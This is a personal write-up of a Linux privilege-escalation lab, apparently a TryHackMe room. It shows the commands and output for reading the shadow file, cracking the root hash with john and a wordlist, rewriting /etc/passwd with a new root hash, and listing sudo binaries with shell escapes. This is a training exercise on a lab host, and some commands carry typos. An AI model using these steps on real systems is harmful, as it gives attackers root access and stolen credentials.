#Metadata

IP: 10.10.182.171
Date accessed: 07/07/2021


# Task 1

```ssh user@10.10.182.171

```
Ran the `id` command to answer the question

# Task 3
1) What is the root user's password hash? 

Answer: `etc /cat/shadow`
- Copy the hash between the colons `:` > answer

2) What hashing algorithm was ued to produce the root user's password hash? 
Answer: 

- `nano hash.txt`
- `john --wordlist=/usr/share/wordlist/rockyou.txt hash.txt`
- wait

```
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123      (?)
1g 0:00:00:00 DONE (2021-07-07 20:01) 2.127g/s 3268p/s 3268c/s 3268C/s kucing..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed


```
# Task 5

1) `openssl passwd critter`

```
root@debian:/home/user# openssl passwd critter
hYwHK598p3frk

```
2) `nano /etc/passwd`
3) replace the `x` with my hash 

```
root:hYwHK598p3frk:0:0:root:/root:/bin/bash


```

4) Run the `id command as the new root user`

```
	uid=0(root) gid=0(root) groups=0(root)

```

# Task 6 

1) How many programs is "user" allowed to run via sudo

```
user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more


```
- Answer: 11

2) One program on the lsit does not have a shell escape sewuence on GTFOBIns, which is it? 

```
Apache2

```

# Task 7

